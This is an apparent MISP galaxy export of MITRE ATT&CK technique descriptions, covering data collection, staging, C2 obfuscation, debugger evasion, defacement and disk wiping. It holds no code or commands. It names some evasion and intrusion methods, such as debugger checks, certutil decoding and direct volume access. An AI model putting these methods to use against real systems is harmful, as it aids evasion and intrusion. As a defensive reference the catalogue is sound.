Many IaaS providers offer solutions for online data object storage such as Amazon S3, Azure Storage, and Google Cloud Storage. Similarly, SaaS enterprise platforms such as Office 365 and Google Workspace provide cloud-based document storage to users through services such as OneDrive and Google Drive, while SaaS application providers such as Slack, Confluence, Salesforce, and Dropbox may provide cloud storage solutions as a peripheral or primary use case of their platform.

In some cases, as with IaaS-based cloud storage, there exists no overarching application (such as SQL or Elasticsearch) with which to interact with the stored objects: instead, data from these solutions is retrieved directly though the Cloud API. In SaaS applications, adversaries may be able to collect this data directly from APIs or backend cloud storage objects, rather than through their front-end application or interface (i.e., Data from Information Repositories).

Adversaries may collect sensitive data from these cloud storage solutions. Providers typically offer security guides to help end users configure systems, though misconfigurations are a common problem.[Amazon S3 Security, 2019][Microsoft Azure Storage Security, 2019][Google Cloud Storage Best Practices, 2019] There have been numerous incidents where cloud storage has been improperly secured, typically by unintentionally allowing public access to unauthenticated users, overly-broad access by all users, or even access for any anonymous person outside the control of the Identity Access Management system without even needing basic user permissions.

This open access may expose various types of sensitive data, such as credit cards, personally identifiable information, or medical records.[Trend Micro S3 Exposed PII, 2017][Wired Magecart S3 Buckets, 2019][HIPAA Journal S3 Breach, 2017][Rclone-mega-extortion_05_2021]

Adversaries may also obtain then abuse leaked credentials from source repositories, logs, or other means as a way to gain access to cloud storage objects.

Internal MISP references

UUID 77069b3f-9e42-4f1b-894f-8df568233df2 which can be used as unique global reference for Data from Cloud Storage in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Google Workspace', 'IaaS', 'Office 365', 'SaaS']
source MITRE
Related clusters

To see the related clusters, click here.

Network Device Configuration Dump

Adversaries may access network configuration files to collect sensitive data about the device and the network. The network configuration is a file containing parameters that determine the operation of the device. The device typically stores an in-memory copy of the configuration while operating, and a separate configuration on non-volatile storage to load after device reset. Adversaries can inspect the configuration files to reveal information about the target network and its layout, the network device and its software, or identifying legitimate accounts and credentials for later use.

Adversaries can use common management tools and protocols, such as Simple Network Management Protocol (SNMP) and Smart Install (SMI), to access network configuration files.[US-CERT TA18-106A Network Infrastructure Devices 2018][Cisco Blog Legacy Device Attacks] These tools may be used to query specific data from a configuration repository or configure the device to export the configuration for later analysis.

Internal MISP references

UUID 0d5a5921-f643-4032-9a4a-0bb693822c21 which can be used as unique global reference for Network Device Configuration Dump in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1602.002
Related clusters

To see the related clusters, click here.

SNMP (MIB Dump)

Adversaries may target the Management Information Base (MIB) to collect and/or mine valuable information in a network managed using Simple Network Management Protocol (SNMP).

The MIB is a configuration repository that stores variable information accessible via SNMP in the form of object identifiers (OID). Each OID identifies a variable that can be read or set and permits active management tasks, such as configuration changes, through remote modification of these variables. SNMP can give administrators great insight in their systems, such as, system information, description of hardware, physical location, and software packages[SANS Information Security Reading Room Securing SNMP Securing SNMP]. The MIB may also contain device operational information, including running configuration, routing table, and interface details.

Adversaries may use SNMP queries to collect MIB content directly from SNMP-managed devices in order to collect network information that allows the adversary to build network maps and facilitate future targeted exploitation.[US-CERT-TA18-106A][Cisco Blog Legacy Device Attacks]

Internal MISP references

UUID 8510638d-5be4-4986-a11c-dcbdc729a50f which can be used as unique global reference for SNMP (MIB Dump) in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1602.001
Related clusters

To see the related clusters, click here.

Data from Configuration Repository

Adversaries may collect data related to managed devices from configuration repositories. Configuration repositories are used by management systems in order to configure, manage, and control data on remote systems. Configuration repositories may also facilitate remote access and administration of devices.

Adversaries may target these repositories in order to collect large quantities of sensitive system administration data. Data from configuration repositories may be exposed by various protocols and software and can store a wide variety of data, much of which may align with adversary Discovery objectives.[US-CERT-TA18-106A][US-CERT TA17-156A SNMP Abuse 2017]

Internal MISP references

UUID 97ef6135-47d4-4b91-8783-c0b5f331340e which can be used as unique global reference for Data from Configuration Repository in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Network']
source MITRE
Related clusters

To see the related clusters, click here.

Code Repositories - Duplicate

Adversaries may leverage code repositories to collect valuable information. Code repositories are tools/services that store source code and automate software builds. They may be hosted internally or privately on third party sites such as Github, GitLab, SourceForge, and BitBucket. Users typically interact with code repositories through a web application or command-line utilities such as git.

Once adversaries gain access to a victim network or a private code repository, they may collect sensitive information such as proprietary source code or credentials contained within software's source code. Having access to software's source code may allow adversaries to develop Exploits, while credentials may provide access to additional resources using Valid Accounts.[Wired Uber Breach][Krebs Adobe]

Note: This is distinct from Code Repositories, which focuses on conducting Reconnaissance via public code repositories.

Internal MISP references

UUID fe595943-f264-4d05-a8c7-7afc8985bfc3 which can be used as unique global reference for Code Repositories - Duplicate in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1213.003
Related clusters

To see the related clusters, click here.

Confluence

Adversaries may leverage Confluence repositories to mine valuable information. Often found in development environments alongside Atlassian JIRA, Confluence is generally used to store development-related documentation, however, in general may contain more diverse categories of useful information, such as:

  • Policies, procedures, and standards
  • Physical / logical network diagrams
  • System architecture diagrams
  • Technical system documentation
  • Testing / development credentials
  • Work / project schedules
  • Source code snippets
  • Links to network shares and other internal resources
Internal MISP references

UUID 3cc64d61-7922-4e08-98ff-b76cb2173830 which can be used as unique global reference for Confluence in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1213.001
Related clusters

To see the related clusters, click here.

Sharepoint

Adversaries may leverage the SharePoint repository as a source to mine valuable information. SharePoint will often contain useful information for an adversary to learn about the structure and functionality of the internal network and systems. For example, the following is a list of example information that may hold potential value to an adversary and may also be found on SharePoint:

  • Policies, procedures, and standards
  • Physical / logical network diagrams
  • System architecture diagrams
  • Technical system documentation
  • Testing / development credentials
  • Work / project schedules
  • Source code snippets
  • Links to network shares and other internal resources
Internal MISP references

UUID 8ac6952d-5add-4cbc-ad39-44943ed3459b which can be used as unique global reference for Sharepoint in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1213.002
Related clusters

To see the related clusters, click here.

Data from Information Repositories

Adversaries may leverage information repositories to mine valuable information. Information repositories are tools that allow for storage of information, typically to facilitate collaboration or information sharing between users, and can store a wide variety of data that may aid adversaries in further objectives, or direct access to the target information. Adversaries may also abuse external sharing features to share sensitive documents with recipients outside of the organization.

The following is a brief list of example information that may hold potential value to an adversary and may also be found on an information repository:

  • Policies, procedures, and standards
  • Physical / logical network diagrams
  • System architecture diagrams
  • Technical system documentation
  • Testing / development credentials
  • Work / project schedules
  • Source code snippets
  • Links to network shares and other internal resources

Information stored in a repository may vary based on the specific instance or environment. Specific common information repositories include web-based platforms such as Sharepoint and Confluence, specific services such as Code Repositories, IaaS databases, enterprise databases, and other storage infrastructure such as SQL Server.

Internal MISP references

UUID 08a73f37-a04e-46be-9409-b330cbe291b4 which can be used as unique global reference for Data from Information Repositories in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Google Workspace', 'IaaS', 'Linux', 'macOS', 'Office 365', 'SaaS', 'Windows']
source MITRE
Related clusters

To see the related clusters, click here.

Data from Local System

Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.

Adversaries may do this using a Command and Scripting Interpreter, such as cmd as well as a Network Device CLI, which have functionality to interact with the file system to gather information.[show_run_config_cmd_cisco] Adversaries may also use Automated Collection on the local system.

Internal MISP references

UUID c0e4f97b-f651-493f-9636-6ac2f6fb46fb which can be used as unique global reference for Data from Local System in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Linux', 'macOS', 'Network', 'Windows']
source MITRE
Related clusters

To see the related clusters, click here.

Data from Network Shared Drive

Adversaries may search network shares on computers they have compromised to find files of interest. Sensitive data can be collected from remote systems via shared network drives (host shared directory, network file server, etc.) that are accessible from the current system prior to Exfiltration. Interactive command shells may be in use, and common functionality within cmd may be used to gather information.

Internal MISP references

UUID 875c5aa3-6ab1-4717-9503-9818ccbad98a which can be used as unique global reference for Data from Network Shared Drive in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Linux', 'macOS', 'Windows']
source MITRE
Related clusters

To see the related clusters, click here.

Data from Removable Media

Adversaries may search connected removable media on computers they have compromised to find files of interest. Sensitive data can be collected from any removable media (optical disk drive, USB memory, etc.) connected to the compromised system prior to Exfiltration. Interactive command shells may be in use, and common functionality within cmd may be used to gather information.

Some adversaries may also use Automated Collection on removable media.

Internal MISP references

UUID ae3f9f0f-af66-424c-bcc8-4fdbd7ef9766 which can be used as unique global reference for Data from Removable Media in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Linux', 'macOS', 'Windows']
source MITRE
Related clusters

To see the related clusters, click here.

Runtime Data Manipulation

Adversaries may modify systems in order to manipulate the data as it is accessed and displayed to an end user, thus threatening the integrity of the data.[FireEye APT38 Oct 2018][DOJ Lazarus Sony 2018] By manipulating runtime data, adversaries may attempt to affect a business process, organizational understanding, and decision making.

Adversaries may alter application binaries used to display data in order to cause runtime manipulations. Adversaries may also conduct Change Default File Association and Masquerading to cause a similar effect. The type of modification and the impact it will have depends on the target application and process as well as the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system that would typically be gained through a prolonged information gathering campaign in order to have the desired impact.

Internal MISP references

UUID 3ec6bb34-4134-40c3-8b67-c0aeceae4471 which can be used as unique global reference for Runtime Data Manipulation in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1565.003
Related clusters

To see the related clusters, click here.

Stored Data Manipulation

Adversaries may insert, delete, or manipulate data at rest in order to influence external outcomes or hide activity, thus threatening the integrity of the data.[FireEye APT38 Oct 2018][DOJ Lazarus Sony 2018] By manipulating stored data, adversaries may attempt to affect a business process, organizational understanding, and decision making.

Stored data could include a variety of file formats, such as Office files, databases, stored emails, and custom file formats. The type of modification and the impact it will have depends on the type of data as well as the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system that would typically be gained through a prolonged information gathering campaign in order to have the desired impact.

Internal MISP references

UUID d693ca8a-dacf-439e-a16b-5f6b3406a21d which can be used as unique global reference for Stored Data Manipulation in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1565.001
Related clusters

To see the related clusters, click here.

Transmitted Data Manipulation

Adversaries may alter data en route to storage or other systems in order to manipulate external outcomes or hide activity, thus threatening the integrity of the data.[FireEye APT38 Oct 2018][DOJ Lazarus Sony 2018] By manipulating transmitted data, adversaries may attempt to affect a business process, organizational understanding, and decision making.

Manipulation may be possible over a network connection or between system processes where there is an opportunity deploy a tool that will intercept and change information. The type of modification and the impact it will have depends on the target transmission mechanism as well as the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system that would typically be gained through a prolonged information gathering campaign in order to have the desired impact.

Internal MISP references

UUID 70365fab-8531-4a0e-b147-7cabdfdef243 which can be used as unique global reference for Transmitted Data Manipulation in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1565.002
Related clusters

To see the related clusters, click here.

Data Manipulation

Adversaries may insert, delete, or manipulate data in order to influence external outcomes or hide activity, thus threatening the integrity of the data. By manipulating data, adversaries may attempt to affect a business process, organizational understanding, or decision making.

The type of modification and the impact it will have depends on the target application and process as well as the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system that would typically be gained through a prolonged information gathering campaign in order to have the desired impact.

Internal MISP references

UUID b77f03e8-f7d0-4d0f-8b79-4642d0fe2709 which can be used as unique global reference for Data Manipulation in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Linux', 'macOS', 'Windows']
source MITRE
Related clusters

To see the related clusters, click here.

Junk Data

Adversaries may add junk data to protocols used for command and control to make detection more difficult. By adding random or meaningless data to the protocols used for command and control, adversaries can prevent trivial methods for decoding, deciphering, or otherwise analyzing the traffic. Examples may include appending/prepending data with junk characters or writing junk characters between significant characters.

Internal MISP references

UUID 584d1c76-7da9-4374-87df-e622d78fc270 which can be used as unique global reference for Junk Data in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1001.001
Related clusters

To see the related clusters, click here.

Protocol Impersonation

Adversaries may impersonate legitimate protocols or web service traffic to disguise command and control activity and thwart analysis efforts. By impersonating legitimate protocols or web services, adversaries can make their command and control traffic blend in with legitimate network traffic.

Adversaries may impersonate a fake SSL/TLS handshake to make it look like subsequent traffic is SSL/TLS encrypted, potentially interfering with some security tooling, or to make the traffic look like it is related with a trusted entity.

Internal MISP references

UUID eb15320a-cd24-45b2-b23f-05ef8daf1039 which can be used as unique global reference for Protocol Impersonation in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1001.003
Related clusters

To see the related clusters, click here.

Steganography - Duplicate

Adversaries may use steganographic techniques to hide command and control traffic to make detection efforts more difficult. Steganographic techniques can be used to hide data in digital messages that are transferred between systems. This hidden information can be used for command and control of compromised systems. In some cases, the passing of files embedded using steganography, such as image or document files, can be used for command and control.

Internal MISP references

UUID 2735f8d1-0e46-4cd7-bfbb-78941bb266fd which can be used as unique global reference for Steganography - Duplicate in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1001.002
Related clusters

To see the related clusters, click here.

Data Obfuscation

Adversaries may obfuscate command and control traffic to make it more difficult to detect. Command and control (C2) communications are hidden (but not necessarily encrypted) in an attempt to make the content more difficult to discover or decipher and to make the communication less conspicuous and hide commands from being seen. This encompasses many methods, such as adding junk data to protocol traffic, using steganography, or impersonating legitimate protocols.

Internal MISP references

UUID 57f95410-5735-43ae-9fec-8b628a7df985 which can be used as unique global reference for Data Obfuscation in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Linux', 'macOS', 'Windows']
source MITRE
Related clusters

To see the related clusters, click here.

Local Data Staging

Adversaries may stage collected data in a central location or directory on the local system prior to Exfiltration. Data may be kept in separate files or combined into one file through techniques such as Archive Collected Data. Interactive command shells may be used, and common functionality within cmd and bash may be used to copy data into a staging location.

Adversaries may also stage collected data in various available formats/locations of a system, including local storage databases/repositories or the Windows Registry.[Prevailion DarkWatchman 2021]

Internal MISP references

UUID 8e32b6ed-58b1-4708-8b86-bd29c3a544d2 which can be used as unique global reference for Local Data Staging in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1074.001
Related clusters

To see the related clusters, click here.

Remote Data Staging

Adversaries may stage data collected from multiple systems in a central location or directory on one system prior to Exfiltration. Data may be kept in separate files or combined into one file through techniques such as Archive Collected Data. Interactive command shells may be used, and common functionality within cmd and bash may be used to copy data into a staging location.

In cloud environments, adversaries may stage data within a particular instance or virtual machine before exfiltration. An adversary may Create Cloud Instance and stage data in that instance.[Mandiant M-Trends 2020]

By staging data on one system prior to Exfiltration, adversaries can minimize the number of connections made to their C2 server and better evade detection.

Internal MISP references

UUID cf76b79c-8226-4137-b3dd-8f516611b928 which can be used as unique global reference for Remote Data Staging in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1074.002
Related clusters

To see the related clusters, click here.

Data Staged

Adversaries may stage collected data in a central location or directory prior to Exfiltration. Data may be kept in separate files or combined into one file through techniques such as Archive Collected Data. Interactive command shells may be used, and common functionality within cmd and bash may be used to copy data into a staging location.[PWC Cloud Hopper April 2017]

In cloud environments, adversaries may stage data within a particular instance or virtual machine before exfiltration. An adversary may Create Cloud Instance and stage data in that instance.[Mandiant M-Trends 2020]

Adversaries may choose to stage data from a victim network in a centralized location prior to Exfiltration to minimize the number of connections made to their C2 server and better evade detection.

Internal MISP references

UUID ef4ef020-5cd1-4859-902b-f207828a1281 which can be used as unique global reference for Data Staged in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['IaaS', 'Linux', 'macOS', 'Windows']
source MITRE
Related clusters

To see the related clusters, click here.

Data Transfer Size Limits

An adversary may exfiltrate data in fixed size chunks instead of whole files or limit packet sizes below certain thresholds. This approach may be used to avoid triggering network data transfer threshold alerts.

Internal MISP references

UUID dc98c882-8fba-4a10-bc6f-43088edb87af which can be used as unique global reference for Data Transfer Size Limits in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Linux', 'macOS', 'Windows']
source MITRE
Related clusters

To see the related clusters, click here.

Debugger Evasion

Adversaries may employ various means to detect and avoid debuggers. Debuggers are typically used by defenders to trace and/or analyze the execution of potential malware payloads.[ProcessHacker Github]

Debugger evasion may include changing behaviors based on the results of the checks for the presence of artifacts indicative of a debugged environment. Similar to Virtualization/Sandbox Evasion, if the adversary detects a debugger, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for debugger artifacts before dropping secondary or additional payloads.

Specific checks will vary based on the target and/or adversary, but may involve Native API function calls such as IsDebuggerPresent() and NtQueryInformationProcess(), or manually checking the BeingDebugged flag of the Process Environment Block (PEB). Other checks for debugging artifacts may also seek to enumerate hardware breakpoints, interrupt assembly opcodes, time checks, or measurements if exceptions are raised in the current process (assuming a present debugger would “swallow” or handle the potential error).[hasherezade debug][AlKhaser Debug][vxunderground debug]

Adversaries may use the information learned from these debugger checks during automated discovery to shape follow-on behaviors. Debuggers can also be evaded by detaching the process or flooding debug logs with meaningless data via messages produced by looping Native API function calls such as OutputDebugStringW().[wardle evilquest partii][Checkpoint Dridex Jan 2021]

Internal MISP references

UUID 945c1564-6c13-4baa-b1d4-6ba82e06a897 which can be used as unique global reference for Debugger Evasion in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Linux', 'macOS', 'Windows']
source MITRE
Related clusters

To see the related clusters, click here.

External Defacement

An adversary may deface systems external to an organization in an attempt to deliver messaging, intimidate, or otherwise mislead an organization or users. External Defacement may ultimately cause users to distrust the systems and to question/discredit the system’s integrity. Externally-facing websites are a common victim of defacement; often targeted by adversary and hacktivist groups in order to push a political message or spread propaganda.[FireEye Cyber Threats to Media Industries][Kevin Mandia Statement to US Senate Committee on Intelligence][Anonymous Hackers Deface Russian Govt Site] External Defacement may be used as a catalyst to trigger events, or as a response to actions taken by an organization or government. Similarly, website defacement may also be used as setup, or a precursor, for future attacks such as Drive-by Compromise.[Trend Micro Deep Dive Into Defacement]

Internal MISP references

UUID 26db57d5-ce6f-4487-a8a8-b4af1c4b6406 which can be used as unique global reference for External Defacement in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1491.002
Related clusters

To see the related clusters, click here.

Internal Defacement

An adversary may deface systems internal to an organization in an attempt to intimidate or mislead users, thus discrediting the integrity of the systems. This may take the form of modifications to internal websites, or directly to user systems with the replacement of the desktop wallpaper.[Novetta Blockbuster] Disturbing or offensive images may be used as a part of Internal Defacement in order to cause user discomfort, or to pressure compliance with accompanying messages. Since internally defacing systems exposes an adversary's presence, it often takes place after other intrusion goals have been accomplished.[Novetta Blockbuster Destructive Malware]

Internal MISP references

UUID 546a3318-0e03-4b22-95f5-c02ff69a4ebf which can be used as unique global reference for Internal Defacement in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1491.001
Related clusters

To see the related clusters, click here.

Defacement

Adversaries may modify visual content available internally or externally to an enterprise network, thus affecting the integrity of the original content. Reasons for Defacement include delivering messaging, intimidation, or claiming (possibly false) credit for an intrusion. Disturbing or offensive images may be used as a part of Defacement in order to cause user discomfort, or to pressure compliance with accompanying messages.

Internal MISP references

UUID 9a21c7c7-cf8e-4f05-b196-86ec39653e3b which can be used as unique global reference for Defacement in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['IaaS', 'Linux', 'macOS', 'Windows']
source MITRE
Related clusters

To see the related clusters, click here.

Deobfuscate/Decode Files or Information

Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.

One such example is the use of certutil to decode a remote access tool portable executable file that has been hidden inside a certificate file.[Malwarebytes Targeted Attack against Saudi Arabia] Another example is using the Windows copy /b command to reassemble binary fragments into a malicious payload.[Carbon Black Obfuscation Sept 2016]

Sometimes a user's action may be required to open it for deobfuscation or decryption as part of User Execution. The user may also be required to input a password to open a password protected compressed/encrypted file that was provided by the adversary. [Volexity PowerDuke November 2016]

Internal MISP references

UUID 88c2fb46-877a-4005-8425-7639d0da1920 which can be used as unique global reference for Deobfuscate/Decode Files or Information in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Linux', 'macOS', 'Windows']
source MITRE
Related clusters

To see the related clusters, click here.

Deploy Container

Adversaries may deploy a container into an environment to facilitate execution or evade defenses. In some cases, adversaries may deploy a new container to execute processes associated with a particular image or deployment, such as processes that execute or download malware. In others, an adversary may deploy a new container configured without network rules, user limitations, etc. to bypass existing defenses within the environment.

Containers can be deployed by various means, such as via Docker's create and start APIs or via a web application such as the Kubernetes dashboard or Kubeflow.[Docker Containers API][Kubernetes Dashboard][Kubeflow Pipelines] Adversaries may deploy containers based on retrieved or built malicious images or from benign images that download and execute malicious payloads at runtime.[Aqua Build Images on Hosts]

Internal MISP references

UUID 2618638c-f6bd-4840-a297-c45076e094a9 which can be used as unique global reference for Deploy Container in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Containers']
source MITRE
Related clusters

To see the related clusters, click here.

Code Signing Certificates - Duplicate

Adversaries may create self-signed code signing certificates that can be used during targeting. Code signing is the process of digitally signing executables and scripts to confirm the software author and guarantee that the code has not been altered or corrupted. Code signing provides a level of authenticity for a program from the developer and a guarantee that the program has not been tampered with.[Wikipedia Code Signing] Users and/or security tools may trust a signed piece of code more than an unsigned piece of code even if they don't know who issued the certificate or who the author is.

Prior to Code Signing, adversaries may develop self-signed code signing certificates for use in operations.

Internal MISP references

UUID 6f152555-36a5-4ec9-8b9b-f0b32c3ccef8 which can be used as unique global reference for Code Signing Certificates - Duplicate in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1587.002
Related clusters

To see the related clusters, click here.

Digital Certificates - Duplicate

Adversaries may create self-signed SSL/TLS certificates that can be used during targeting. SSL/TLS certificates are designed to instill trust. They include information about the key, information about its owner's identity, and the digital signature of an entity that has verified the certificate's contents are correct. If the signature is valid, and the person examining the certificate trusts the signer, then they know they can use that key to communicate with its owner. In the case of self-signing, digital certificates will lack the element of trust associated with the signature of a third-party certificate authority (CA).

Adversaries may create self-signed SSL/TLS certificates that can be used to further their operations, such as encrypting C2 traffic (ex: Asymmetric Cryptography with Web Protocols) or even enabling Adversary-in-the-Middle if added to the root of trust (i.e. Install Root Certificate).

After creating a digital certificate, an adversary may then install that certificate (see Install Digital Certificate) on infrastructure under their control.

Internal MISP references

UUID 5bcbb0c5-7061-481f-a677-09028a6c59f7 which can be used as unique global reference for Digital Certificates - Duplicate in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1587.003
Related clusters

To see the related clusters, click here.

Exploits - Duplicate

Adversaries may develop exploits that can be used during targeting. An exploit takes advantage of a bug or vulnerability in order to cause unintended or unanticipated behavior to occur on computer hardware or software. Rather than finding/modifying exploits from online or purchasing them from exploit vendors, an adversary may develop their own exploits.[NYTStuxnet] Adversaries may use information acquired via Vulnerabilities to focus exploit development efforts. As part of the exploit development process, adversaries may uncover exploitable vulnerabilities through methods such as fuzzing and patch analysis.[Irongeek Sims BSides 2017]

As with legitimate development efforts, different skill sets may be required for developing exploits. The skills needed may be located in-house, or may need to be contracted out. Use of a contractor may be considered an extension of that adversary's exploit development capabilities, provided the adversary plays a role in shaping requirements and maintains an initial degree of exclusivity to the exploit.

Adversaries may use exploits during various phases of the adversary lifecycle (i.e. Exploit Public-Facing Application, Exploitation for Client Execution, Exploitation for Privilege Escalation, Exploitation for Defense Evasion, Exploitation for Credential Access, Exploitation of Remote Services, and Application or System Exploitation).

Internal MISP references

UUID 5a57d258-0b23-431b-b50e-3150d2c0e52c which can be used as unique global reference for Exploits - Duplicate in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1587.004
Related clusters

To see the related clusters, click here.

Malware - Duplicate

Adversaries may develop malware and malware components that can be used during targeting. Building malicious software can include the development of payloads, droppers, post-compromise tools, backdoors (including backdoored images), packers, C2 protocols, and the creation of infected removable media. Adversaries may develop malware to support their operations, creating a means for maintaining control of remote machines, evading defenses, and executing post-compromise behaviors.[Mandiant APT1][Kaspersky Sofacy][ActiveMalwareEnergy][FBI Flash FIN7 USB]

As with legitimate development efforts, different skill sets may be required for developing malware. The skills needed may be located in-house, or may need to be contracted out. Use of a contractor may be considered an extension of that adversary's malware development capabilities, provided the adversary plays a role in shaping requirements and maintains a degree of exclusivity to the malware.

Some aspects of malware development, such as C2 protocol development, may require adversaries to obtain additional infrastructure. For example, malware developed that will communicate with Twitter for C2, may require use of Web Services.[FireEye APT29]

Internal MISP references

UUID 0f77a14a-d450-4885-b81f-23eeffa53a7e which can be used as unique global reference for Malware - Duplicate in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1587.001
Related clusters

To see the related clusters, click here.

Develop Capabilities

Adversaries may build capabilities that can be used during targeting. Rather than purchasing, freely downloading, or stealing capabilities, adversaries may develop their own capabilities in-house. This is the process of identifying development requirements and building solutions such as malware, exploits, and self-signed certificates. Adversaries may develop capabilities to support their operations throughout numerous phases of the adversary lifecycle.[Mandiant APT1][Kaspersky Sofacy][Bitdefender StrongPity June 2020][Talos Promethium June 2020]

As with legitimate development efforts, different skill sets may be required for developing capabilities. The skills needed may be located in-house, or may need to be contracted out. Use of a contractor may be considered an extension of that adversary's development capabilities, provided the adversary plays a role in shaping requirements and maintains a degree of exclusivity to the capability.

Internal MISP references

UUID bf660248-2098-499b-b90c-8c47efb26c70 which can be used as unique global reference for Develop Capabilities in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['PRE']
source MITRE
Related clusters

To see the related clusters, click here.

Device Driver Discovery

Adversaries may attempt to enumerate local device drivers on a victim host. Information about device drivers may highlight various insights that shape follow-on behaviors, such as the function/purpose of the host, present security tools (i.e. Security Software Discovery) or other defenses (e.g., Virtualization/Sandbox Evasion), as well as potential exploitable vulnerabilities (e.g., Exploitation for Privilege Escalation).

Many OS utilities may provide information about local device drivers, such as driverquery.exe and the EnumDeviceDrivers() API function on Windows.[Microsoft Driverquery][Microsoft EnumDeviceDrivers] Information about device drivers (as well as associated services, i.e., System Service Discovery) may also be available in the Registry.[Microsoft Registry Drivers]

On Linux/macOS, device drivers (in the form of kernel modules) may be visible within /dev or using utilities such as lsmod and modinfo.[Linux Kernel Programming][lsmod man][modinfo man]

Internal MISP references

UUID 70ffc700-eb9b-54d7-8fd4-564bd71a6434 which can be used as unique global reference for Device Driver Discovery in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Linux', 'macOS', 'Windows']
source MITRE
Related clusters

To see the related clusters, click here.

Direct Volume Access

Adversaries may directly access a volume to bypass file access controls and file system monitoring. Windows allows programs to have direct access to logical volumes. Programs with direct access may read and write files directly from the drive by analyzing file system data structures. This technique may bypass Windows file access controls as well as file system monitoring tools. [Hakobyan 2009]

Utilities, such as NinjaCopy, exist to perform these actions in PowerShell.[Github PowerSploit Ninjacopy] Adversaries may also use built-in or third-party utilities (such as vssadmin, wbadmin, and esentutl) to create shadow copies or backups of data from system volumes.[LOLBAS Esentutl]

Internal MISP references

UUID 447f1d32-31f7-44b5-834a-dcba8b038e7f which can be used as unique global reference for Direct Volume Access in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
source MITRE
Related clusters

To see the related clusters, click here.

Disk Content Wipe

Adversaries may erase the contents of storage devices on specific systems or in large numbers in a network to interrupt availability to system and network resources.

Adversaries may partially or completely overwrite the contents of a storage device rendering the data irrecoverable through the storage interface.[Novetta Blockbuster][Novetta Blockbuster Destructive Malware][DOJ Lazarus Sony 2018] Instead of wiping specific disk structures or files, adversaries with destructive intent may wipe arbitrary portions of disk content. To wipe disk content, adversaries may acquire direct access to the hard drive in order to overwrite arbitrarily sized portions of disk with random data.[Novetta Blockbuster Destructive Malware] Adversaries have also been observed leveraging third-party drivers like RawDisk to directly access disk content.[Novetta Blockbuster][Novetta Blockbuster Destructive Malware] This behavior is distinct from Data Destruction because sections of the disk are erased instead of individual files.

To maximize impact on the target organization in operations where network-wide availability interruption is the goal, malware used for wiping disk content may have worm-like features to propagate across a network by leveraging additional techniques like Valid Accounts, OS Credential Dumping, and SMB/Windows Admin Shares.[Novetta Blockbuster Destructive Malware]

Internal MISP references

UUID 761fa7fa-d7e1-4796-85b3-5cd37d55dffa which can be used as unique global reference for Disk Content Wipe in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1561.001
Related clusters

To see the related clusters, click here.

Disk Structure Wipe

Adversaries may corrupt or wipe the disk data structures on a hard drive necessary to boot a system; targeting specific critical systems or in large numbers in a network to interrupt availability to system and network resources.

